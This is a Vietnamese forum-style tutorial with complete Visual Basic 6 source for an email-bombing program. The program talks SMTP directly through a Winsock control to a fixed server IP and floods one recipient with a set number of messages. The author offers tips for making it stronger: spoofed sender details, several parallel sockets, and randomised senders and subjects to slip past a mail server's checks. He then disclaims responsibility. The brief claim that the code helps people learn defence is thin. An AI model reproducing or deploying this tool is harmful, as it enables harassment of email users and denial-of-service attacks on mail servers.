Lập một chương trình bommail :
Bạn luôn bị bomb mail hoặc luôn bomb người khác nhưng bạn cư phải sài những chương trình bomb mail của người khác tạo ra tại sao bạn lại sử dụng một chương trình bomb mail của người khác mà không tự viết một cái để xài và tich luỹ kinh nghiệm chống bomb.Và bạn có bao giờ nghĩ rằng một chương trình bomb mail bạn tải về bạn đang sử dụng có thể chứa những đoạn source vô cùng nguy hiểm hay không chắc bạn chưa bao giờ nghĩ đến điều đó đúng không ?? Bản thân người viết một chương trình free hoàn toàn cho bạn sử dụng như là một công cụ để chơi khăm người khác thì tại sao người ấy lại không có ý định muốn chơi trên cơ bạn ... có thể những điều mình nói trên hơi quá nhưng có ai dám chắc là nó không hề xảy ra. Thế để viết một chương trình bomb mail có khó không theo mình thì với khả năng lập trình về Visual basic tương đối và có hiểu biết một chút ít về winsock controls thêm nữa là qui tắc cơ bản để gởi một email nạp danh bằng telnet thì các bạn đã tự tin mà nói rằng mình cũng có thể viết được một chương trình như vậy. Vậy tại sao các bạn không bắt tay vào mà viết ngay đi. Còn chờ gì nữa. . Các bạn hãy nhớ câu nói rằng ("Gian" làm được là các bạn có thể làm được). Phần source của chương trình bomb mail tôi sẽ gởi tới cho các bạn tham khảo .Và cũng từ những chương trình như vậy,bạn sẽ biết được những nhược điểm của những chương trình bomb mail mà tìm ra cách để chống nó


Và đây là đoạn source mà các bạn mong đợi.
Phần chuẩn bị đầu tiên của chương trình là:
1/Tất nhiên là phải mở Microsoft Visual Basic (tôi sử dụng phiên bản 6.0)
2/Tạo một Form mới (tôi đặc tên Form này là frmMain)
3/Vào trên thanh Menu -->Project -->Components-->đánh dấu chọn vào mục Microsoft Winsock Control 6.0, sao đó nhấn OK thoát ra và kéo nó vào trong frmMain (nó sẽ có tên mặt định là Winsock1, cứ để nó thế nếu bạn muốn đổi tên cho khác một tý thì phần source dưới đây bạn phải đổi tên các sub Event cho nó nha.)
4/Tạo một nút lệnh (command) và đặt tên nó là cmdBomb.
5/Tạo một label có tên là lblStatus thông báo trạng thái của tiến trình
6/nhấn phải ngay frmMain vào phần View Code và bắt đầu nhá.
Và đây là đoạn code của chương trình tôi sẽ cố gắn chú thích trước mỗi đoạn code cho các bạn dễ nắm.
'---------------------------------------------------
'Khai bao bien
'Bien kiem soat cau lenh goi di
Dim strCaulenh As String
'Bien de nhan thong tin tu server goi ve
Dim strData As String
'Bien de kiem soat so luong mail da goi di
Dim intbomb As Integer
'Tao Function cau lenh connect vao smtp server va tra ve cho ham mot chuoi ky tu dai dien de de be kiem soat.
Function clConnect(sckSend As Winsock, MailServerName As String) As String
'Kiem tra tinh trang cua sockket neu no o trang thai dong thi tien hanh ket noi
If sckSend.State = sckClosed Then
'Thiet lap Protocol
sckSend.Protocol = sckTCPProtocol
'Khai bao SMTP server se cho vao ham
sckSend.RemoteHost = MailServerName
'Khai bao Cong ket noi thuong la cong 25
sckSend.RemotePort = 25
'Goi cau lenh ket noi
sckSend.Connect
'Tra ve cho ham chuoi "Connect to" phan nay rat quan trong vi dung de kiem tra cung voi gia tri do server tra ve xem ket noi da OK hay chua.. ban se hieu ro muc dich cua phan nay. Day chinh la su khac biet ma toi da nghien cuu va so sanh voi cac source bomb mail tuong tu va toi nhan thay no rat hieu qua va don gian hon bat cu giai thuat nao khac. Moi ham sau day deu tra ve mot chuoi thong bao tuong tu
clConnect = "Connect to"
End If
End Function
'Tao Function goi cau lenh "helo" toi server ban nen luu y la moi cuoi cau lenh deu co ky tu dai dien cho phim Enter.
Function clHelo(sckSend As Winsock, txthello As String) As String
sckSend.SendData ("helo " + txthello + vbCrLf)
clHelo = "Helo"
End Function
'Tao Function goi cau lenh "mail from:" co them bien dia chi mail nguoi goi
Function clMailfrom(sckSend As Winsock, txtmailfrom As String) As String
sckSend.SendData ("mail from: " + txtmailfrom + vbCrLf)
clMailfrom = "Mail From"
End Function
'Tao Function goi cau lenh "rcpt to: " co them bien dia chi mail nguoi nhan
Function clRcptto(sckSend As Winsock, txtmailto As String) As String
sckSend.SendData ("rcpt to: " + txtmailto + vbCrLf)
clRcptto = "Rcpt To"
End Function
'Tao Function goi cau lenh "data" cau lenh bat dau mot noi dung cua buc thu
Function clData(sckSend As Winsock) As String
sckSend.SendData ("data" + vbCrLf)
clData = "Data"
End Function
'Tao function goi noi dung buc thu va co ket thuc la dau enter+ dau . + enter
Function clBody(sckSend As Winsock, strFromName As String, strToName As String, strSubject As String, strBody As String) As String
'khai bao cac bien tam theo thu tu
Dim Fourth As String, Fifth As String, Sixth As String
Dim Seventh As String, Eighth As String
'ai goi ??
Fourth = "From:" + Chr(32) + strFromName + vbCrLf
'Ai nhan ??
Fifth = "To:" + Chr(32) + strToName + vbCrLf

'Chu de buc thu
Sixth = "Subject:" + Chr(32) + strSubject + vbCrLf

'noi dung buc thu
Seventh = strBody + vbCrLf

'phan dau tien cua buc thu duoc goi truoc
Eighth = Fourth + Fifth + Sixth
'goi di phan dau
sckSend.SendData (Eighth + vbCrLf)

'goi tiep noi dung
sckSend.SendData (Seventh + vbCrLf)
'ket thuc noi dung va goi thu di
sckSend.SendData ("." + vbCrLf)
clBody = "Body"
End Function
'Tao ham thoat khoi server
Function clQuit(sckSend As Winsock) As String
sckSend.SendData ("quit" + vbCrLf)
clQuit = "Quit"
End Function
'va day la su kien khi nut lenh cmdBomb duoc click
Private Sub cmdbomb_Click()
lblStatus.Caption = ""
'hien thoi chua co mail nao duoc goi
intbomb = 0
'Bay loi
On Error GoTo thongbaoloi
'noi vao SMTP server co IP o day toi chon la 203.162.0.27
'Cac ban cung co the thay doi la "host name" hay IP address deu duoc ca. hoac co the xem chu thich 1 tai cuoi bai.
strCaulenh = clConnect(Winsock1, "203.162.0.27")
Exit Sub
thongbaoloi:
lblStatus.Caption = "Kiem tra ket noi cua ban"
End Sub
'Day la phan quan trong nhat cua chuong trinh, cac ban nen nam ro sau nay co the dung thuat toan nay de phat trien khong chi la goi thu qua SMTP server ma con nhan thu tu Pop3 ...
'Nhung gi server tra thong bao ve se nam o day
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
'lay du lieu tu server tra ve
Winsock1.GetData strData
'bao ra nhan
lblStatus.Caption = strData
'neu 3 ky tu dau cua chuoi ma server tra ve sau khi nhan
'duoc cau lenh connect co gia tri la "220" tuc la server da
'chap nhan ket noi thi thuc hien tiep cau lenh "helo"
If (strCaulenh = "Connect to" And Left(strData, 3)= "220") Then
'xoa gia tri cho bien
strCaulenh = ""
strData = ""
strCaulenh = clHelo(Winsock1, "hotmail.com")
End If

'Tuong tu nhu tren neu moi viec dien ra tot dep thi goi tiep cau lenh "mail from: mail nguoi goi" co the xem them chu thich 2 cuoi bai.
If (strCaulenh = "Helo" And Left(strData, 3) = "250") Then
strCaulenh = ""
strData = ""
strCaulenh = clMailfrom(Winsock1, "mail nguoi goi")
End If
'Lan luoc goi tiep cac cau lenh tiep theo voi dieu kien chuoi ky tu cua server tra ve hoan toan hop le
If (strCaulenh = "Mail From" And Left(strData, 3) = "250") Then
strCaulenh = ""
strData = ""
strCaulenh = clRcptto(Winsock1, "mail nguoi nhan")
'xem chu thich vuoi bai
End If
If (strCaulenh = "Rcpt To" And Left(strData, 3) = "250") Then
strCaulenh = ""
strData = ""
strCaulenh = clData(Winsock1)
End If
If (strCaulenh = "Data" And Left(strData, 3) = "354") Then
strCaulenh = ""
strData = ""
strCaulenh = clBody(Winsock1, "ten nguoi goi", "ten nguoi nhan", "chu de buc thu", "noi dung buc thu")
End If
If (strCaulenh = "Body" And Left(strData, 3) = "250") Then
strCaulenh = ""
strData = ""
'kiem tra neu so luong mail da goi du thu cham dut
If intbomb >= 100 Then 'so luong mail can bom. xem chu thich ben duoi
strCaulenh = clQuit(Winsock1)
lblStatus.Caption = "Da bomb xong!"
'neu so luong mail chua du thi goi tiep
Else
intbomb = intbomb + 1
strCaulenh = clMailfrom(Winsock1, "ten nguoi goi")
End If
End If
End Sub
'neu socket ket noi bi loi
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
lblStatus.Caption = "Kiem tra ket noi hoac SMTP server"
Winsock1.Close
End Sub
'----------------------------------------------------------
Thế là bạn đã viết được một chương trình bomb mail hoàn chỉnh rồi đó .. còn lại là công việc trang trí giao diện sao cho chương trình được đẹp mắt, nên thêm một số bẫy lỗi khi cần thiết để trách khi thực hiện chương trình bị hư dột suất vì nhiều lý do về mạng.
Những mục mà tôi đề nghị các bạn xem phần chú thích bên dưới này là những mục không quan trọng nhưng bạn nên thêm vào chương trình cho người sử dụng linh động trong việc cho vào địa chỉ mail người gởi, địa chỉ mail nguời nhận, tên người gởi, tên người nhận, số lượng mail cần dội bomb. và SMTP server nữa.
Bạn nên tạo những textbox cho ngưòi sủ dụng nhập những thông số kia vào tôi ví dụ (txtmailfrom --> thay thế "mail nguoi goi", txtmailto --> "mail nguoi nhan", txtnumbermail ---> thay thế cho số 100 mail cần gởi, txtMailserver -> dia chỉ của SMTP server, txtFromname -> "ten nguoi goi", txtToName-->"ten nguoi nhan", txtSubject-> chủ đề bức thư, txtBody->Nội dung bức thư, cho người sử dụng tự ý nhập vào và bạn đường quên một điều là phải kiểm tra xem dữ liệu người sử dụng đưa vào có hợp lệ hay không (chẳng hạn dịa chỉ mail có đúng chuẩn là địa chỉ mail hay không ... .) để hạn chế lỗi có thể xuất hiện vì dữ liệu nhập vào không đúng. Tôi nghĩ công việc đó quá đơn giản phải không các bạn. Một điều nữa là các bạn có thể kết hợp nhiều winsock để quá trình mail đuợc nhanh hơn, mạnh hơn, đó là phần của các bạn. Nếu các bạn cần chương trình tôi đã viết thì hãy mail cho tôi theo địa chỉ mail sau: ***g3ta@hotmail.com tôi rất sẵng lòng gởi chương trình cho các bạn. còn một điều quan trọng là chương trình này các bạn sử dụng với mục đích gì là tuỳ ý các bạn. Tôi không chịu trách nhiệm nào đâu nhé ..hehehe.. Và nên nhớ một điều là nêu muốn tấn công một server mail nào đó thì nên cho phần địa chỉ người gởi một cách ngẫu nhiên
người nhận một cách ngẫu nhiên và chủ đề một cách ngẫu nhiên để tránh tình trạng relay của server. Mong các bạn thích chương trình này và hãy tự mình khám phá. Tôi sẽ trở lại với một chủ đề thú vị hơn. Cám ơn và mong các bạn đóng góp ý kiến và cùng nhau học tập trao đổi kinh nghiệm vì một mục đích tốt đẹp